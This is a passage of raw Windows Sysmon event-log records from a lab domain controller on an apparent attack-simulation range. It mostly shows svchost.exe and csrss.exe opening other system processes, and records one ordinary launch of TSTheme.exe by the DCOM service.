10341000x8000000000000000440915Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.864{42DC5269-D4CC-6086-E904-00000000BA01}47845968C:\Windows\system32\csrss.exe{42DC5269-028B-6088-C628-00000000BA01}1280C:\Windows\system32\TSTheme.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000440914Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.863{42DC5269-CE98-6086-0C00-00000000BA01}8406468C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440913Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.863{42DC5269-CE98-6086-0C00-00000000BA01}8406468C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440912Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.863{42DC5269-CE98-6086-0C00-00000000BA01}8406468C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440911Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.863{42DC5269-CE98-6086-0C00-00000000BA01}8406468C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440910Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.863{42DC5269-CE98-6086-0C00-00000000BA01}8406468C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440909Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.863{42DC5269-CE98-6086-0C00-00000000BA01}8406468C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440908Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.863{42DC5269-CE98-6086-0C00-00000000BA01}8406468C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440907Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.863{42DC5269-CE98-6086-0C00-00000000BA01}8406468C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440906Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.863{42DC5269-CE98-6086-0C00-00000000BA01}8406468C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440905Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.862{42DC5269-CE96-6086-0500-00000000BA01}412528C:\Windows\system32\csrss.exe{42DC5269-028B-6088-C628-00000000BA01}1280C:\Windows\system32\TSTheme.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000440904Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.861{42DC5269-CE98-6086-0C00-00000000BA01}8406468C:\Windows\system32\svchost.exe{42DC5269-028B-6088-C628-00000000BA01}1280C:\Windows\system32\TSTheme.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35af2|c:\windows\system32\rpcss.dll+3c90d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000440903Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.861{42DC5269-028B-6088-C628-00000000BA01}1280C:\Windows\System32\TSTheme.exe10.0.14393.4169 (rs1_release.210107-1130)TSTheme Server ModuleMicrosoft® Windows® Operating SystemMicrosoft CorporationTSThemeS.exeC:\Windows\system32\TSTheme.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{42DC5269-D4CE-6086-10ED-2D0000000000}0x2ded102HighMD5=D5E6B1DA9AEE1CC85A50894A07700B98,SHA256=3A22AAA677B8B658386F6A22ECFB36795DC1BE55AED591FEAA05CA8D36973464,IMPHASH=851EBF0BAEED8A212E02B93229FDC674{42DC5269-CE98-6086-0C00-00000000BA01}840C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x8000000000000000440902Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.860{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1700-00000000BA01}1340C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440901Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.859{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1200-00000000BA01}480C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440900Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.859{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440899Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.858{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1400-00000000BA01}1052C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440898Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.858{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1400-00000000BA01}1052C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440897Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.858{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1400-00000000BA01}1052C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440896Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.857{42DC5269-CE98-6086-0C00-00000000BA01}8406468C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440895Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.857{42DC5269-CE98-6086-0C00-00000000BA01}8406468C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440894Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.857{42DC5269-CE98-6086-0C00-00000000BA01}8406468C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440893Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.857{42DC5269-CE98-6086-0C00-00000000BA01}8406468C:\Windows\system32\svchost.exe{42DC5269-028B-6088-C428-00000000BA01}6416C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440892Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.857{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CE96-6086-0B00-00000000BA01}628C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440891Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.857{42DC5269-CE98-6086-0C00-00000000BA01}8406468C:\Windows\system32\svchost.exe{42DC5269-028B-6088-C428-00000000BA01}6416C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440890Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 